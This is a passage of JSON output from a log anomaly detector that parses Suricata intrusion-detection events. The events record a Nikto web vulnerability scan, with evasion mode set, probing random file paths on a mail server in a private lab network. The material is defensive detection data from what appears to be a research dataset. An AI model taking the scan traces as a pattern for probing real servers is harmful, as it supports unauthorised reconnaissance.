"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46848,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.java\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.java\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46848,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.java\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.java\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.java\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.java\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.java", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.java", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46848,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46848, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":1729286961271675,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 1729286961271675, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.235367+0000\",\"flow_id\":1729286961271675,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46848,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.java\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.java\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.24 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.236933 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46850 -> 192.168.10.154:80", "/parser/model/time": 1583349514.236933, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46850, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.236933 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46850 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.24 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.conf", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.237117+0000\",\"flow_id\":656541569686162,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46850,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.conf\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.conf\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.237117, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":656541569686162,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46850,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.conf\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.conf\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46850,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.conf\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.conf\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.conf\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.conf\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.conf", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.conf", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46850,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46850, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":656541569686162,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 656541569686162, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.237117+0000\",\"flow_id\":656541569686162,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46850,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.conf\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.conf\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.24 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.239413 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46852 -> 192.168.10.154:80", "/parser/model/time": 1583349514.239413, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46852, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.239413 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46852 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.24 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.sql", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.239713+0000\",\"flow_id\":499362946523941,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46852,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.sql\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.sql\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.239713, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":499362946523941,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46852,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.sql\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.sql\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46852,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.sql\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.sql\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.sql\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.sql\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.sql", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.sql", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46852,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46852, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":499362946523941,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 499362946523941, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.239713+0000\",\"flow_id\":499362946523941,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46852,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.sql\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.sql\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.24 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.241805 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46854 -> 192.168.10.154:80", "/parser/model/time": 1583349514.241805, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46854, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.241805 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46854 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.24 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", 